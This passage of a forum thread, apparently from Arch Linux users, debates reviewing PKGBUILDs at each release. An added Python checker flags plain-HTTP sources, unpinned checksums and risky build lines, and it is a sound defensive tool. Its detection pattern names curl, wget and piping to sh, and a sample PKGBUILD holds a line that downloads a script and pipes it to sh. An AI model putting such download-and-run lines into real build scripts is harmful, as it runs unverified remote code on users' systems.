2 Jan 2016, 11:31 p.m.
But I also have to with a source package since I won't check the sources with each release ;)
Which is plain stupid.
How is that stupid? Do you check the sources with each release? *How* do you perform those checks?
Perhaps there's a misunderstanding here. Not checking at least the PKGBUILD on each rebuild *would* be reckless at best and plain stupid at worst, but that's not what you suggested. Assuming trust in the upstream, I don't see too big an issue with simply asserting that the PKGBUILD pulls the source from the right place over an authenticated channel (i.e. HTTPS) and doesn't do anything weird in the build functions.
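As an added example (not part of this thread), the two assertions made above, that sources are pulled over HTTPS with pinned checksums and that prepare/build/package do nothing unexpected, checked statically in Python so the PKGBUILD is never sourced; the two PKGBUILDs at the bottom are constructed samples and the regexes only approximate bash syntax, they are not makepkg's parser.

```python
import re
SCHEME_RE = re.compile(r'^(?:[^:/]+::)?([a-z][a-z0-9+.-]*)://', re.I)
# Lines in prepare/build/package that fetch, escalate, or write outside $pkgdir.
RISKY_RE = re.compile(r'\b(curl|wget|sudo)\b|\|\s*(ba)?sh\b|\$HOME|(?<![\w}])/(etc|usr)/')

def _array(name, text):
    """Items of the bash array `name=( ... )`, quotes stripped (minimal parser)."""
    m = re.search(r'^%s=\((.*?)\)' % name, text, re.S | re.M)
    return [t.strip('\'"') for t in re.findall(r"'[^']*'|\"[^\"]*\"|\S+", m.group(1))] if m else []

def _func_body(name, text):
    """Body of `name() { ... }`; assumes the closing brace is on its own line."""
    m = re.search(r'^%s\(\)\s*\{(.*?)^\}' % name, text, re.S | re.M)
    return m.group(1) if m else ''

def check_pkgbuild(text):
    """Return the findings; an empty list means the basic assertions hold."""
    findings, vcs = [], 0
    for src in _array('source', text):
        m = SCHEME_RE.match(src)
        if not m:
            continue  # local file shipped alongside the PKGBUILD
        scheme = m.group(1).lower()
        vcs += '+' in scheme  # git+https://..., hg+https://... are VCS sources
        if scheme not in ('https', 'git+https'):
            findings.append('unauthenticated transport: ' + src)
    sums = [s for n in ('sha256sums', 'sha512sums', 'b2sums') for s in _array(n, text)]
    if sums.count('SKIP') > vcs:
        findings.append('SKIP on a non-VCS source: checksum is not pinned')
    for fn in ('prepare', 'build', 'package'):
        for line in _func_body(fn, text).splitlines():
            if RISKY_RE.search(line):
                findings.append('%s(): %s' % (fn, line.strip()))
    return findings

# Constructed samples: one that passes every check and one that fails each of them.
GOOD = """\
source=("https://example.org/foo-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$srcdir/foo-1.0" && make
}
"""
BAD = """\
source=("http://example.org/bar-2.0.tar.gz")
sha256sums=('SKIP')
build() {
  curl -s http://example.org/helper.sh | sh
}
"""
```

`check_pkgbuild(GOOD)` returns an empty list; `check_pkgbuild(BAD)` reports the plain-HTTP source, the SKIP checksum and the download-and-run line in build().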